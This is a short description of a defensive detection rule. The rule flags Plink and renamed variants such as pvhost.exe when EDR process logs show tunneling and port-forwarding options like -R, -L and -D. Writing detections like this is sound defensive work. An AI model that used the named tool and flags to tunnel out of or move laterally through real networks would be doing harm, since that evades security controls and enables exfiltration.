This analytic is focused on detecting the usage of Plink (an SSH client) or its renamed variants such as pvhost.exe, specifically in scenarios where they are employed for protocol tunneling. Plink is commonly utilized for egress or lateral movement in networks, which can circumvent established network security measures. This rule analyzes process execution logs from Endpoint Detection and Response (EDR) agents for specific command-line options typically associated with port forwarding and tunneling, including options like -R, -L, -D, -N, -P, -pw, and others. Instances of this behavior can indicate potential security threats, such as data exfiltration or unauthorized lateral movement within an organization's infrastructure. By covering both the original and renamed executables, the detection aims to enhance its efficacy against evasion tactics that malicious entities might adopt to engage in unauthorized network activities. If confirmed, this activity could be indicative of sophisticated attacks aimed at compromising the security integrity of an organization, thereby necessitating prompt investigation and remediation of the identified instances.